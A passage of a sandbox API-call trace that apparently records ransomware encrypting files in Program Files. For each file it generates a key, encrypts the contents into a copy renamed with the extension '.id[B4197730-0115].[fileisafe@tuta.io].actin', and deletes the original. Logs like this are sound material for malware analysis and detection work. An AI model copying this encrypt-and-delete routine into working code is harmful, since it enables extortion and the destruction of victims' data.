returned 1 [0068.202] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.OLB.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\designer\\msaddndr.olb.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0068.202] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa20, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa7c | out: phKey=0x38efa7c*=0xf71d80) returned 1 [0068.202] CryptSetKeyParam (hKey=0xf71d80, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0068.202] ReadFile (in: hFile=0x324, lpBuffer=0x3e5c020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x38efaa4, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesRead=0x38efaa4*=0x3e70, lpOverlapped=0x0) returned 1 [0068.204] CryptEncrypt (in: hKey=0xf71d80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x3e80, dwBufLen=0x3e80 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x3e80) returned 1 [0068.204] WriteFile (in: hFile=0x334, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x3e80, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x3e80, lpOverlapped=0x0) returned 1 [0068.205] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa14, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa80 | out: phKey=0x38efa80*=0xf71bc0) returned 1 [0068.205] CryptSetKeyParam (hKey=0xf71bc0, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0068.205] CryptEncrypt (in: hKey=0xf71bc0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x40, dwBufLen=0x40 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x40) returned 1 [0068.205] CryptDestroyKey (hKey=0xf71bc0) returned 1 [0068.205] WriteFile (in: hFile=0x334, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0xf2, lpOverlapped=0x0) returned 1 [0068.205] CryptDestroyKey (hKey=0xf71d80) returned 1 [0068.205] CloseHandle (hObject=0x324) returned 1 [0068.205] CloseHandle (hObject=0x334) returned 1 [0068.206] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.OLB" (normalized: "c:\\program files\\common files\\designer\\msaddndr.olb")) returned 1 [0068.208] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0068.208] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\grove_fame_lightning.exe" (normalized: "c:\\program files\\common files\\grove_fame_lightning.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0068.208] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=75776) returned 1 [0068.208] CloseHandle (hObject=0x334) returned 1 [0068.208] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\grove_fame_lightning.exe" (normalized: "c:\\program files\\common files\\grove_fame_lightning.exe")) returned 0x20 [0068.208] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\grove_fame_lightning.exe.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\grove_fame_lightning.exe.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0068.208] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\grove_fame_lightning.exe" (normalized: "c:\\program files\\common files\\grove_fame_lightning.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0068.208] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0068.208] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-file-l1-2-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-file-l1-2-0.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0068.208] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=18624) returned 1 [0068.209] CloseHandle (hObject=0x334) returned 1 [0068.209] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-file-l1-2-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-file-l1-2-0.dll")) returned 0x20 [0068.209] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-file-l1-2-0.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-file-l1-2-0.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0068.209] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-file-l1-2-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-file-l1-2-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0068.209] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0068.209] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0068.209] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-file-l1-2-0.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-file-l1-2-0.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0068.210] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa20, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa7c | out: phKey=0x38efa7c*=0xf71c00) returned 1 [0068.210] CryptSetKeyParam (hKey=0xf71c00, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0068.210] ReadFile (in: hFile=0x334, lpBuffer=0x3e5c020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x38efaa4, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesRead=0x38efaa4*=0x48c0, lpOverlapped=0x0) returned 1 [0068.211] CryptEncrypt (in: hKey=0xf71c00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x48d0, dwBufLen=0x48d0 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x48d0) returned 1 [0068.211] WriteFile (in: hFile=0x324, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x48d0, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x48d0, lpOverlapped=0x0) returned 1 [0068.213] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa14, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa80 | out: phKey=0x38efa80*=0xf71dc0) returned 1 [0068.213] CryptSetKeyParam (hKey=0xf71dc0, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0068.213] CryptEncrypt (in: hKey=0xf71dc0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x60, dwBufLen=0x60 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x60) returned 1 [0068.213] CryptDestroyKey (hKey=0xf71dc0) returned 1 [0068.213] WriteFile (in: hFile=0x324, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x112, lpOverlapped=0x0) returned 1 [0068.213] CryptDestroyKey (hKey=0xf71c00) returned 1 [0068.213] CloseHandle (hObject=0x334) returned 1 [0068.213] CloseHandle (hObject=0x324) returned 1 [0068.214] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-file-l1-2-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-file-l1-2-0.dll")) returned 1 [0068.215] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0068.215] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-file-l2-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-file-l2-1-0.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0068.215] GetFileSizeEx (in: hFile=0x324, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=18624) returned 1 [0068.215] CloseHandle (hObject=0x324) returned 1 [0068.216] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-file-l2-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-file-l2-1-0.dll")) returned 0x20 [0068.216] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-file-l2-1-0.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-file-l2-1-0.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0068.216] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-file-l2-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-file-l2-1-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0068.216] SetFilePointerEx (in: hFile=0x324, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0068.216] SetFilePointerEx (in: hFile=0x324, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0068.216] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-file-l2-1-0.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-file-l2-1-0.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0068.216] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa20, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa7c | out: phKey=0x38efa7c*=0xf71a00) returned 1 [0068.216] CryptSetKeyParam (hKey=0xf71a00, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0068.217] ReadFile (in: hFile=0x324, lpBuffer=0x3e5c020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x38efaa4, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesRead=0x38efaa4*=0x48c0, lpOverlapped=0x0) returned 1 [0068.218] CryptEncrypt (in: hKey=0xf71a00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x48d0, dwBufLen=0x48d0 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x48d0) returned 1 [0068.218] WriteFile (in: hFile=0x334, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x48d0, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x48d0, lpOverlapped=0x0) returned 1 [0068.219] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa14, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa80 | out: phKey=0x38efa80*=0xf720c0) returned 1 [0068.219] CryptSetKeyParam (hKey=0xf720c0, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0068.219] CryptEncrypt (in: hKey=0xf720c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x60, dwBufLen=0x60 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x60) returned 1 [0068.219] CryptDestroyKey (hKey=0xf720c0) returned 1 [0068.219] WriteFile (in: hFile=0x334, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x112, lpOverlapped=0x0) returned 1 [0068.219] CryptDestroyKey (hKey=0xf71a00) returned 1 [0068.219] CloseHandle (hObject=0x324) returned 1 [0068.219] CloseHandle (hObject=0x334) returned 1 [0068.220] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-file-l2-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-file-l2-1-0.dll")) returned 1 [0068.221] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0068.221] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-localization-l1-2-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-localization-l1-2-0.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0068.221] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=21184) returned 1 [0068.221] CloseHandle (hObject=0x334) returned 1 [0068.222] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-localization-l1-2-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-localization-l1-2-0.dll")) returned 0x20 [0068.222] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-localization-l1-2-0.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-localization-l1-2-0.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0068.222] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-localization-l1-2-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-localization-l1-2-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0068.222] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0068.222] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0068.222] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-localization-l1-2-0.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-localization-l1-2-0.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0068.222] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa20, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa7c | out: phKey=0x38efa7c*=0xf71b00) returned 1 [0068.222] CryptSetKeyParam (hKey=0xf71b00, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0068.222] ReadFile (in: hFile=0x334, lpBuffer=0x3e5c020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x38efaa4, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesRead=0x38efaa4*=0x52c0, lpOverlapped=0x0) returned 1 [0068.223] CryptEncrypt (in: hKey=0xf71b00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x52d0, dwBufLen=0x52d0 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x52d0) returned 1 [0068.224] WriteFile (in: hFile=0x324, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x52d0, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x52d0, lpOverlapped=0x0) returned 1 [0068.225] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa14, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa80 | out: phKey=0x38efa80*=0xf71c00) returned 1 [0068.225] CryptSetKeyParam (hKey=0xf71c00, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0068.225] CryptEncrypt (in: hKey=0xf71c00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x70, dwBufLen=0x70 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x70) returned 1 [0068.225] CryptDestroyKey (hKey=0xf71c00) returned 1 [0068.225] WriteFile (in: hFile=0x324, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x122, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x122, lpOverlapped=0x0) returned 1 [0068.225] CryptDestroyKey (hKey=0xf71b00) returned 1 [0068.225] CloseHandle (hObject=0x334) returned 1 [0068.225] CloseHandle (hObject=0x324) returned 1 [0068.226] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-localization-l1-2-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-localization-l1-2-0.dll")) returned 1 [0068.227] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0068.227] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-processthreads-l1-1-1.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-processthreads-l1-1-1.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0068.227] GetFileSizeEx (in: hFile=0x324, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=19136) returned 1 [0068.227] CloseHandle (hObject=0x324) returned 1 [0068.228] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-processthreads-l1-1-1.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-processthreads-l1-1-1.dll")) returned 0x20 [0068.228] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-processthreads-l1-1-1.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-processthreads-l1-1-1.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0068.228] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-processthreads-l1-1-1.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-processthreads-l1-1-1.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0068.228] SetFilePointerEx (in: hFile=0x324, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0068.228] SetFilePointerEx (in: hFile=0x324, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0068.228] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-processthreads-l1-1-1.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-processthreads-l1-1-1.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x24c [0068.229] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa20, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa7c | out: phKey=0x38efa7c*=0xf71f40) returned 1 [0068.229] CryptSetKeyParam (hKey=0xf71f40, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0068.229] ReadFile (in: hFile=0x324, lpBuffer=0x3e5c020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x38efaa4, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesRead=0x38efaa4*=0x4ac0, lpOverlapped=0x0) returned 1 [0068.231] CryptEncrypt (in: hKey=0xf71f40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x4ad0, dwBufLen=0x4ad0 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x4ad0) returned 1 [0068.231] WriteFile (in: hFile=0x24c, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x4ad0, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x4ad0, lpOverlapped=0x0) returned 1 [0068.232] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa14, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa80 | out: phKey=0x38efa80*=0xf71a00) returned 1 [0068.232] CryptSetKeyParam (hKey=0xf71a00, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0068.232] CryptEncrypt (in: hKey=0xf71a00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x80, dwBufLen=0x80 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x80) returned 1 [0068.232] CryptDestroyKey (hKey=0xf71a00) returned 1 [0068.232] WriteFile (in: hFile=0x24c, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x132, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x132, lpOverlapped=0x0) returned 1 [0068.232] CryptDestroyKey (hKey=0xf71f40) returned 1 [0068.233] CloseHandle (hObject=0x324) returned 1 [0068.233] CloseHandle (hObject=0x24c) returned 1 [0068.233] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-processthreads-l1-1-1.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-processthreads-l1-1-1.dll")) returned 1 [0068.234] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0068.234] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-synch-l1-2-0.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x24c [0068.235] GetFileSizeEx (in: hFile=0x24c, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=19136) returned 1 [0068.235] CloseHandle (hObject=0x24c) returned 1 [0068.235] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-synch-l1-2-0.dll")) returned 0x20 [0068.235] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-synch-l1-2-0.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-synch-l1-2-0.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0068.235] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-synch-l1-2-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x24c [0068.235] SetFilePointerEx (in: hFile=0x24c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0068.235] SetFilePointerEx (in: hFile=0x24c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0068.235] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-synch-l1-2-0.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-synch-l1-2-0.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0068.235] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa20, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa7c | out: phKey=0x38efa7c*=0xf72080) returned 1 [0068.235] CryptSetKeyParam (hKey=0xf72080, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) 